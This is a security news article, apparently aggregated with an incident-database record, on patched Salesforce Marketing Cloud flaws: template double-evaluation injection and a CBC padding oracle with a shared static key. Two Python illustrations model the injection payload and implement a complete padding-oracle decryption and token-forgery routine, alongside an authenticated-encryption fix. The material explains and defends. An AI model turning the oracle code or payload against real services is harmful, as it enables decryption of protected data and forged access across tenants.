Salesforce Marketing Cloud Patches Critical Vulnerabilities Exposing Subscriber Data
Salesforce recently addressed a series of high-severity vulnerabilities in its Marketing Cloud (SFMC) platform that could have allowed attackers to access and exfiltrate marketing emails, subscriber records, and engagement data across multiple tenants including Fortune 500 organizations.
The flaws stemmed from weaknesses in SFMC's server-side templating and encryption mechanisms. AMPScript and SSJS, the languages used for dynamic email personalization, include functions such as TreatAsContent that take a string and evaluate it as template code. When a string built from a user-controlled field (a subscriber's name, for example) reached such a function, or a subject line was evaluated a second time, the attacker-supplied text ran as template code during evaluation instead of being inserted as data. From there, built-in functions such as LookupRows could query internal data views, exposing subscriber lists, sent emails, and tracking data.
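To make the double-evaluation path concrete, the following is an added Python model written for this page; it is not AMPScript, not SFMC code, and not Searchlight Cyber's proof of concept. It supports one tag form, %%=Function(args)=%%, two functions standing in for AttributeValue and LookupRows, and a constructed _Sent view; the names, the sample data, and the decision to model the lookup against a data view (as the text describes) are all assumptions. The vulnerable renderer evaluates the subject twice, so a profile field that merely looks like a tag is executed on the second pass; the fixed renderer evaluates once and inserts the field as data.

```python
import re

# Constructed stand-in for an SFMC data view; layout and values are assumptions.
SENT_VIEW = [
    {"JobID": 1001, "EmailAddress": "alice@example.com"},
    {"JobID": 1001, "EmailAddress": "bob@example.com"},
]

# One tag form only: %%=Function("arg", ...)=%% (a small subset of AMPScript's inline syntax).
TAG = re.compile(r'%%=\s*(\w+)\(([^)]*)\)\s*=%%')


def _call(name, raw_args, attrs):
    """Model of two template functions; unknown calls are rejected."""
    args = [a.strip().strip('"') for a in raw_args.split(",") if a.strip()]
    if name == "AttributeValue":                       # subscriber-controlled profile data
        return str(attrs.get(args[0], ""))
    if name == "LookupRows" and args[0] == "_Sent":    # hypothetical data-view lookup
        return ";".join(r["EmailAddress"] for r in SENT_VIEW if str(r["JobID"]) == args[1])
    raise ValueError(f"unsupported call {name}")


def render_once(template, attrs):
    # re.sub never rescans the text it substitutes, so a single pass treats
    # every returned value as data, whatever it looks like.
    return TAG.sub(lambda m: _call(m.group(1), m.group(2), attrs), template)


def render_subject_vulnerable(template, attrs):
    # Double evaluation: the first pass's output is parsed again as template
    # code, so a field value shaped like a tag now executes.
    return render_once(render_once(template, attrs), attrs)


def render_subject_fixed(template, attrs):
    return render_once(template, attrs)


SUBJECT = 'Hello %%=AttributeValue("FirstName")=%%, your order shipped'
# Constructed attacker payload placed in a self-service "first name" field.
INJECTED = {"FirstName": '%%=LookupRows("_Sent", "1001")=%%'}
```

With INJECTED as the subscriber's attributes, render_subject_vulnerable returns the addresses of everyone who received job 1001 inside the subject line, while render_subject_fixed returns the payload text verbatim; an honest first name renders identically in both.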
A more severe issue involved SFMC's "view email in browser" and CloudPages features, which relied on encrypted query-string (qs) parameters as the only proof that a visitor was entitled to a given email or page. Researchers at Searchlight Cyber found that the older "classic" qs format used CBC-mode encryption with no integrity check, and the server's differing responses to malformed padding formed a padding oracle: by submitting modified ciphertexts and observing the verdict, an attacker could decrypt existing parameters and build valid ciphertext for chosen values without ever learning the key. A still older scheme XORed the parameters with a static key, so sensitive identifiers such as JobID and ListSubscriber could be recovered almost instantly. Because the same static key served every tenant, a qs token forged against one tenant was equally valid for another organization's emails and subscriber data.
The vulnerabilities were reported on 16 January 2026 and mitigated between 21 and 24 January 2026. Salesforce migrated the qs parameters to AES-GCM, an authenticated mode that rejects any modified ciphertext before it is decrypted, rotated keys, disabled double evaluation of email subject templates, and invalidated all legacy tracking and CloudPages links created before 21 January 2026 (23:00 UTC), a step that also affects links in emails delivered before that time. No confirmed malicious exploitation was reported.
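The padding-oracle weakness described above, and the authenticated-encryption fix, as an added self-contained Python example that is not SFMC code and not the researchers' tooling. A toy Feistel block cipher stands in for AES so the file runs on the standard library alone (the attack never looks inside the cipher); the "server" is one function that reports only whether a submitted token's padding was valid; the classic-qs plaintexts (JobID=..., ListSubscriber=...) and the shared key are constructed; and the fix is modelled as encrypt-then-MAC rather than the AES-GCM Salesforce deployed, since either rejects a modified token before its padding is examined. The attacker code holds no key: it recovers a real token's plaintext and forges a token naming another tenant's job using nothing but the server's yes/no answers.

```python
import functools
import hashlib
import hmac
import secrets

BLOCK = 16

# Toy 16-byte block cipher (4-round Feistel over SHA-256) standing in for AES; the attack never looks inside it.
def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]
def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r
def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r

def _blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n
def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")                # the distinguishable failure
    return data[:-n]

def cbc_encrypt(key, plaintext):
    out = [secrets.token_bytes(BLOCK)]                 # IV
    for p in _blocks(pad(plaintext)):
        out.append(block_encrypt(key, _xor(p, out[-1])))
    return b"".join(out)
def cbc_decrypt(key, token):
    c = _blocks(token)
    return unpad(b"".join(_xor(block_decrypt(key, c[i]), c[i - 1]) for i in range(1, len(c))))

# Server side: one key for every tenant, and endpoints whose answer reveals bad padding.
SHARED_KEY = secrets.token_bytes(32)
MAC_KEY = secrets.token_bytes(32)                      # used only by the fixed scheme

def _accepts(decrypt, token):                          # all the attacker ever observes
    try:
        return decrypt(SHARED_KEY, token) is not None  # decrypt returns bytes or raises
    except ValueError:
        return False
classic_qs_accepts = functools.partial(_accepts, cbc_decrypt)

def oracle_recover_block(oracle, prev, target):        # attacker side: no key, only the oracle
    inter = bytearray(BLOCK)                           # D(target), learned last byte first
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos
        for guess in range(256):
            crafted = bytearray(inter[j] ^ padv if j > pos else 0 for j in range(BLOCK))
            crafted[pos] = guess                       # known bytes decrypt to padv; test this one
            ok = oracle(bytes(crafted) + target)
            if ok and pos == BLOCK - 1:                # rule out a spurious 0x02 0x02 match
                crafted[pos - 1] ^= 0xFF
                ok = oracle(bytes(crafted) + target)
            if ok:
                inter[pos] = guess ^ padv
                break
    return _xor(bytes(inter), prev)                    # plaintext = D(target) XOR previous block

def oracle_decrypt(oracle, token):
    c = _blocks(token)
    return unpad(b"".join(oracle_recover_block(oracle, c[i - 1], c[i]) for i in range(1, len(c))))

def oracle_forge(oracle, plaintext):
    out = [secrets.token_bytes(BLOCK)]                 # the last ciphertext block can be anything
    for p in reversed(_blocks(pad(plaintext))):        # prev = 0 makes the call return D(block)
        out.append(_xor(oracle_recover_block(oracle, bytes(BLOCK), out[-1]), p))
    return b"".join(reversed(out))                     # IV || C1 || ... || Cn

# The fix, modelled as encrypt-then-MAC (Salesforce chose AES-GCM): the tag is checked before any padding is.
def authenticated_encrypt(key, plaintext):
    ct = cbc_encrypt(key, plaintext)
    return ct + hmac.new(MAC_KEY, ct, hashlib.sha256).digest()
def authenticated_decrypt(key, token):
    ct, tag = token[:-32], token[-32:]
    if not hmac.compare_digest(tag, hmac.new(MAC_KEY, ct, hashlib.sha256).digest()):
        raise ValueError("authentication failed")      # same error for every bad token
    return cbc_decrypt(key, ct)
authenticated_qs_accepts = functools.partial(_accepts, authenticated_decrypt)

def demo():
    token = cbc_encrypt(SHARED_KEY, b"JobID=1001;ListSubscriber=7")             # constructed tenant-A link
    forged = oracle_forge(classic_qs_accepts, b"JobID=2002;ListSubscriber=9")   # names another tenant's job
    return {"recovered": oracle_decrypt(classic_qs_accepts, token),
            "forged_decrypts_to": cbc_decrypt(SHARED_KEY, forged),
            "forged_rejected_by_fix": not authenticated_qs_accepts(forged + bytes(32)),
            "genuine_accepted_by_fix": authenticated_qs_accepts(authenticated_encrypt(SHARED_KEY, b"JobID=1001"))}
```

demo() recovers the original plaintext and produces a forgery that the classic endpoint decrypts to the attacker's chosen JobID, at a cost of roughly 4,000 oracle queries per 16-byte block. Against the authenticated endpoint every one of those crafted queries returns False, so neither the decryption nor the forgery can begin. The single SHARED_KEY is also what makes the forgery cross-tenant in this model: with a key per tenant, a token forged through one tenant's oracle would be accepted only by that tenant.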
The incident underscores the risk concentrated in shared SaaS infrastructure, where a single template-engine or cryptographic flaw can expose high-value marketing data across every tenant at once. Salesforce assigned multiple CVEs covering the broken encryption, the hard-coded keys, and argument injection in the MicrositeURL and CloudPages workflows.
Source: https://gbhackers.com/salesforce-marketing-cloud-vulnerability/
Agentforce Marketing cybersecurity rating report: https://www.rankiteo.com/company/salesforce-marketing-cloud-
Fortune cybersecurity rating report: https://www.rankiteo.com/company/fortune
"id": "SALFOR1778063116",
"linkid": "salesforce-marketing-cloud-, fortune",
"type": "Vulnerability",
"date": "1/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"
{'affected_entities': [{'customers_affected': 'Multiple tenants',
'industry': ['Marketing', 'Technology'],
'name': 'Salesforce Marketing Cloud (SFMC) Tenants',
'size': 'Enterprise (Fortune 500 organizations '
'included)',
'type': 'SaaS Platform'}],
'attack_vector': ['Template Injection', 'Cryptographic Weakness Exploitation'],
'data_breach': {'data_encryption': ['Broken (CBC encryption with padding '
'oracle)',
'Legacy XOR-based encryption with static '
'key'],
'data_exfiltration': 'Possible',
'personally_identifiable_information': 'Subscriber records',
'sensitivity_of_data': 'High (subscriber data, tracking data)',
'type_of_data_compromised': ['Marketing emails',
'Subscriber records',
'Engagement data']},
'date_detected': '2026-01-16',
'date_resolved': '2026-01-24',
'description': 'Salesforce recently addressed a series of high-severity '
'vulnerabilities in its Marketing Cloud (SFMC) platform that '
'could have allowed attackers to access and exfiltrate '
'marketing emails, subscriber records, and engagement data '
'across multiple tenants including Fortune 500 organizations. '
'The flaws stemmed from weaknesses in SFMC’s server-side '
'templating and encryption mechanisms.',
'impact': {'data_compromised': ['Marketing emails',
'Subscriber records',
'Engagement data'],
'systems_affected': ['Salesforce Marketing Cloud (SFMC)']},
'investigation_status': 'Resolved',
'lessons_learned': 'The incident underscores risks in shared SaaS '
'infrastructure, where template engines and cryptographic '
'flaws can expose high-value marketing data at scale.',
'post_incident_analysis': {'corrective_actions': ['Migrated to AES-GCM '
'encryption',
'Rotated encryption keys',
'Disabled double evaluation '
'of email subject templates',
'Invalidated legacy '
'tracking and CloudPages '
'links',
'Assigned CVEs to address '
'vulnerabilities'],
'root_causes': ['Weaknesses in server-side '
'templating (AMPScript/SSJS)',
'Broken encryption (CBC padding '
'oracle, static XOR key)',
'Hard-coded encryption keys',
'Argument injection '
'vulnerabilities']},
'references': [{'source': 'Searchlight Cyber'}],
'response': {'containment_measures': ['Migrated to AES-GCM encryption',
'Rotated encryption keys',
'Disabled double evaluation of email '
'subject templates',
'Invalidated all legacy tracking and '
'CloudPages links created before 21 '
'January 2026 (23:00 UTC)'],
'remediation_measures': ['Patched vulnerabilities',
'Assigned multiple CVEs']},
'title': 'Salesforce Marketing Cloud Patches Critical Vulnerabilities '
'Exposing Subscriber Data',
'type': ['Data Breach', 'Vulnerability Exploitation'],
'vulnerability_exploited': ['CBC encryption padding oracle',
'Static XOR encryption key',
'AMPScript/SSJS template injection',
'Hard-coded encryption keys',
'Argument injection in MicrositeURL and '
'CloudPages']}